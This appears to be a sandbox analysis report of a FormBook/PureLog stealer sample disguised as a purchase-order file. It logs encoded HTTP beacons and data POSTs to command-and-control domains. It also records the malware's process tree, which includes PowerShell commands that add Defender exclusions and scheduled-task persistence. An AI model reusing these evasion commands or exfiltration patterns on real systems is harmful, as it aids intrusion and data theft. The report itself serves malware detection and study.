                                                                                                            Data Raw: 4c 52 57 3d 67 58 70 2f 68 49 6c 4c 66 78 74 50 30 6b 4f 6b 6f 53 7a 35 6e 58 73 2f 79 52 53 74 75 4b 58 75 38 6a 36 76 68 70 4a 45 50 69 63 4a 75 4a 42 39 49 6c 30 75 31 6f 36 77 78 43 71 52 31 35 55 54 64 4a 4f 69 77 7a 61 69 4a 53 6a 46 79 64 75 4d 55 4f 6f 63 41 57 4f 4c 61 2f 36 6d 68 79 48 32 47 73 6a 6a 4e 53 32 78 6a 63 6f 78 59 45 56 76 6c 4e 56 43 69 72 4e 6c 6d 52 52 72 56 56 56 65 74 71 4a 63 6e 7a 72 46 42 37 4b 4d 56 4f 42 49 6e 62 35 49 49 6f 4e 79 4e 33 6b 63 50 35 52 59 55 68 54 51 42 75 30 66 4f 42 51 6c 4e 74 4d 34 63 77 5a 7a 4e 5a 52 74 6c 68 38 48 43 61 54 73 68 38 55 35 6d 34 66 77 69 64 52 6f 51 45 4d 66 37 76 69 61 32 39 2b 6f 34 6c 4f 64 64 79 39 55 4e 57 6d 2f 71 68 50 6d 2f 6c 66 51 2f 7a 39 42 42 77 77 6f 43 43 47 76 38 51 6c 77 39 2f 76 44 61 71 35 6f 62 31 4d 65 36 6e 62 51 6d 6a 6a 57 46 45 5a 51 65 50 65 54 65 4c 5a 4c 58 50 63 58 2b 45 66 45 55 44 78 4b 75 4a 78 69 6c 7a 48 59 70 41 36 36 50 4c 70 46 64 6f 6b 63 41 77 75 51 44 43 63 72 36 63 47 75 36 4c 61 48 75 61 [TRUNCATED]
                                                                                                            Data Ascii: LRW= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49860 | 154.23.176.197 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:44:14.372795105 CET | 467 | OUT | GET /b20s/?LRW=tVBfi4VbWyAR4A6JwX/2lnpR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u+as/M6yp5i3EDz3+5965KIAUeXyPV8KfzAH0F+33TTK6hNoSGlASxdt3tI0=&fvqp6=9vfXK HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Host: www.shipincheshi.today
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Nov 27, 2024 16:44:16.038902998 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Wed, 27 Nov 2024 15:58:32 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED]
                                                                                                            Data Ascii: 2000<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
Nov 27, 2024 16:44:16.038922071 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a
                                                                                                            Data Ascii: cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pr
Nov 27, 2024 16:44:16.038995981 CET | 448 | IN | Data Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a
                                                                                                            Data Ascii: padding: 16px; border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x
Nov 27, 2024 16:44:16.039007902 CET | 1236 | IN | Data Raw: 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20
                                                                                                            Data Ascii: ne-block; min-width: 100%; box-sizing: border-box; font-size:14px; font-family: "Century Gothic",Consolas,"Liberation Mono",Courier,Verdana; padding-left: 48px; } .excepti
Nov 27, 2024 16:44:16.039097071 CET | 1236 | IN | Data Raw: 20 2a 2f 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70
                                                                                                            Data Ascii: */ .exception-var table{ width: 100%; margin: 12px 0; box-sizing: border-box; table-layout:fixed; word-wrap:break-word; } .exception-var table cap
Nov 27, 2024 16:44:16.039108992 CET | 1236 | IN | Data Raw: 6e 74 73 20 77 69 74 68 20 74 68 65 20 63 6c 61 73 73 65 73 20 62 65 6c 6f 77 20 61 72 65 20 61 64 64 65 64 20 62 79 20 70 72 65 74 74 79 70 72 69 6e 74 2e 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 70
                                                                                                            Data Ascii: nts with the classes below are added by prettyprint. */ pre.prettyprint .pln { color: #000 } /* plain text */ pre.prettyprint .str { color: #080 } /* string content */ pre.prettyprint .kwd { color: #008 } /* a keywor
Nov 27, 2024 16:44:16.039123058 CET | 1236 | IN | Data Raw: 65 70 74 69 6f 6e 5c 48 74 74 70 45 78 63 65 70 74 69 6f 6e 22 3e 48 74 74 70 45 78 63 65 70 74 69 6f 6e 3c 2f 61 62 62 72 3e 20 69 6e 20 3c 61 20 63 6c 61 73 73 3d 22 74 6f 67 67 6c 65 22 20 74 69 74 6c 65 3d 22 2f 77 77 77 2f 77 77 77 72 6f 6f
                                                                                                            Data Ascii: eption\HttpException">HttpException</abbr> in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuankk144.sbs/thinkphp/library/think/route/dispatch/Module.php line 62">Module.php line 62</a></h2> </div> <div><
Nov 27, 2024 16:44:16.039302111 CET | 896 | IN | Data Raw: 3c 63 6f 64 65 3e 20 20 20 20 20 20 20 20 7d 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65 2d 36 35 22 3e 3c 63 6f 64 65 3e 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65
                                                                                                            Data Ascii: <code> }</code></li><li class="line-65"><code></code></li><li class="line-66"><code> // </code></li><li class="line-67"><code> $convert = is_bool($this-&gt;convert) ? $this-&gt;con
Nov 27, 2024 16:44:16.039330006 CET | 1236 | IN | Data Raw: 72 6f 75 74 65 2f 64 69 73 70 61 74 63 68 2f 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 22 3e 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: route/dispatch/Module.php line 62">Module.php line 62</a></li> <li> at <abbr title="think\route\dispatch\Module">Module</abbr>->init() in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuank
Nov 27, 2024 16:44:16.039341927 CET | 224 | IN | Data Raw: 70 52 33 52 43 71 71 4d 4f 7a 2f 69 50 6b 38 71 34 52 4e 79 31 42 32 70 78 31 5a 6a 78 47 33 63 6a 53 2f 6e 32 75 20 61 73 2f 4d 36 79 70 35 69 33 45 44 7a 33 20 35 39 36 35 4b 49 41 55 65 58 79 50 56 38 4b 66 7a 41 48 30 46 20 33 33 54 54 4b 36
                                                                                                            Data Ascii: pR3RCqqMOz/iPk8q4RNy1B2px1ZjxG3cjS/n2u as/M6yp5i3EDz3 5965KIAUeXyPV8KfzAH0F 33TTK6hNoSGlASxdt3tI0= </td> </tr> <tr> <td>fvqp6</td>
Nov 27, 2024 16:44:16.159933090 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 39 76 66 58 4b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <td> 9vfXK </td> </tr> </tbody> </table> <table> <caption>POST Data<small>empty</s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49878 | 194.58.112.174 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:44:21.925726891 CET | 722 | OUT | POST /7plr/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.elinor.club
                                                                                                            Origin: http://www.elinor.club
                                                                                                            Referer: http://www.elinor.club/7plr/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 200
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6d 2f 6f 31 71 6a 52 6e 48 77 62 37 44 58 61 41 42 33 73 32 75 4c 73 2f 5a 6d 4a 65 64 74 7a 2b 58 65 6c 56 78 30 6f 4d 67 57 65 6b 53 4d 33 4b 41 56 67 74 30 72 41 6b 45 68 6a 42 64 32 37 57 58 52 31 30 4f 4e 6a 55 65 34 46 52 71 6b 6c 7a 77 34 34 6a 42 30 4d 54 53 72 77 4b 42 57 63 36 36 6c 45 57 61 79 66 5a 67 47 46 77 34 4d 78 6c 5a 74 31 55 71 56 66 79 50 44 56 67 36 51 4e 72 4c 33 45 62 59 6a 72 43 4b 52 67 7a 79 45 6c 55 41 45 2b 79 73 53 65 78 39 61 36 33 39 37 73 49 53 39 53 4a 57 46 70 4e 4d 56 42 65 64 58 6c 63 2f 74 4e 36 53 35 41 7a 70 4a 4d 74 50 4d 71 31 63 41 3d 3d
                                                                                                            Data Ascii: LRW=m/o1qjRnHwb7DXaAB3s2uLs/ZmJedtz+XelVx0oMgWekSM3KAVgt0rAkEhjBd27WXR10ONjUe4FRqklzw44jB0MTSrwKBWc66lEWayfZgGFw4MxlZt1UqVfyPDVg6QNrL3EbYjrCKRgzyElUAE+ysSex9a6397sIS9SJWFpNMVBedXlc/tN6S5AzpJMtPMq1cA==
Nov 27, 2024 16:44:23.316205025 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                            Server: nginx
                                                                                                            Date: Wed, 27 Nov 2024 15:44:23 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 154
                                                                                                            Connection: close
                                                                                                            Location: http://elinor.club/7plr/
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID:14
Source IP:192.168.2.4
Source Port:49884
Destination IP:194.58.112.174
Destination Port:80
PID:5608
Process:C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
Timestamp:Nov 27, 2024 16:44:24.587764978 CET
Bytes transferred:742
Direction:OUT
Data:
POST /7plr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: www.elinor.club
Origin: http://www.elinor.club
Referer: http://www.elinor.club/7plr/
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Ascii: LRW=m/o1qjRnHwb7RDmADQ42i7s4VGJeE9z6XepVx18chgOkSo7KBXItxrAkcRjEAG7jXQIJOMPUe4RRqhBzxLQgBkMRUrwyM2c66lEWaxj/gGdw48hlf5BVn1fxMDVgwAMiL3EtYmXoKVQzyG9UHV+xlSezgK7Y875/KPndfFtDNRxlRxoGucstA5kA0OFZCPX8HFATTAMW93aI85gDucdxVw8=
Timestamp:Nov 27, 2024 16:44:25.958144903 CET
Bytes transferred:341
Direction:IN
Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 27 Nov 2024 15:44:25 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://elinor.club/7plr/
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID:15
Source IP:192.168.2.4
Source Port:49891
Destination IP:194.58.112.174
Destination Port:80
PID:5608
Process:C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
Timestamp:Nov 27, 2024 16:44:27.263787031 CET
Bytes transferred:10824
Direction:OUT
Data:
POST /7plr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: www.elinor.club
Origin: http://www.elinor.club
Referer: http://www.elinor.club/7plr/
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 10300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Data Ascii: LRW= [TRUNCATED]
Timestamp:Nov 27, 2024 16:44:28.671099901 CET
Bytes transferred:341
Direction:IN
Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 27 Nov 2024 15:44:28 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://elinor.club/7plr/
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID:16
Source IP:192.168.2.4
Source Port:49898
Destination IP:194.58.112.174
Destination Port:80
PID:5608
Process:C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
Timestamp:Nov 27, 2024 16:44:29.924264908 CET
Bytes transferred:460
Direction:OUT
Data:
GET /7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.elinor.club
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Timestamp:Nov 27, 2024 16:44:31.285835981 CET
Bytes transferred:478
Direction:IN
Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 27 Nov 2024 15:44:31 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL+vM7NE/eWH/lfB0APMSfRaR1rRBz2uUzJ3oOd5olZUFD7UQvVw3JpX4K8u0SeOs3hkY=
                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>



                                                                                                            Target ID:0
                                                                                                            Start time:10:42:26
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
                                                                                                            Imagebase:0x8b0000
                                                                                                            File size:1'001'992 bytes
                                                                                                            MD5 hash:574C0E8C1D426321E95BD8476334F271
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
                                                                                                            Imagebase:0x6a0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
                                                                                                            Imagebase:0x6a0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"
                                                                                                            Imagebase:0x3d0000
                                                                                                            File size:187'904 bytes
                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:10:42:35
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0xb50000
                                                                                                            File size:45'984 bytes
                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:10:42:36
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            Imagebase:0x300000
                                                                                                            File size:1'001'992 bytes
                                                                                                            MD5 hash:574C0E8C1D426321E95BD8476334F271
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 55%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:10:42:38
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:12
                                                                                                            Start time:10:42:46
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp"
                                                                                                            Imagebase:0x3d0000
                                                                                                            File size:187'904 bytes
                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:13
                                                                                                            Start time:10:42:46
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:14
                                                                                                            Start time:10:42:47
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0x530000
                                                                                                            File size:45'984 bytes
                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:17
                                                                                                            Start time:10:42:57
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe"
                                                                                                            Imagebase:0x40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
